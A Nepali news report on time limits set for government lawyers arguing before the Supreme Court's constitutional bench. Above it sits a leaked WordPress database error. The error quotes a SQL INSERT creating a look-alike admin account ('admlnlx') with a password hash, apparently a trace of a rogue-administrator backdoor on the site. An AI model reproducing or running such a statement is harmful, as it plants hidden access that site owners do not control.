WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bo5tMMBc0kRoT43wZW8WaizZJW7KRy0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-23 03:43:16', '', 'admlnlx', 'admlnlx')
सर्वोच्च अदालतको संवैधानिक इजलासमा छलफल भइरहेको समय दिइएको छ ।
आइतबारको इजलासको सुरुमै संवैधानिक इजलासको नेतृत्व गरिरहेका प्रधानन्यायाधीश चोलेन्द्रशम्शेर जबराले आजदेखि सरकारी वकिललाई १५ मिनेट समय निर्धारण गरिएको बताए ।
शुक्रबारसम्म सरकार पक्षका ८ जनाले बहस गरिसकेका छन् । जसमा ७ जना सरकारी वकिल हुन् । सरकारको प्रतिरक्षामा महान्यायाधिवक्ता अग्नि खरेल, वरिष्ठ अधिवक्ता सुशील पन्त, नायव महान्यायाधिवक्ताहरु पदमप्रसाद पाण्डेय, नारायणप्रसाद पौडेल, विश्वराज कोइराला र सहन्यायाधिवक्ताहरु सञ्जीवराज रेग्मी, लोकराज बराल र खेमराज ज्ञवालीले बहस गरिसकेका छन् ।
उनीहरुका लागि समय निर्धारण गरिएको थिएन । अब सरकारी वकिलहरु नायब महान्याधिवक्ता टेकबहादुर घिमिरे, सहन्यायाधिवक्ताद्वय श्याम भट्टराई, उद्धवप्रसाद पुडासैनी र उपन्यायाधिवक्ता दशरथ पंगेनीले बहस गर्न बाँकी छ । त्यसबाहेक प्रधानन्यायाधीशको निजी वकिलहरुले पनि बहस गर्न बाँकी छ ।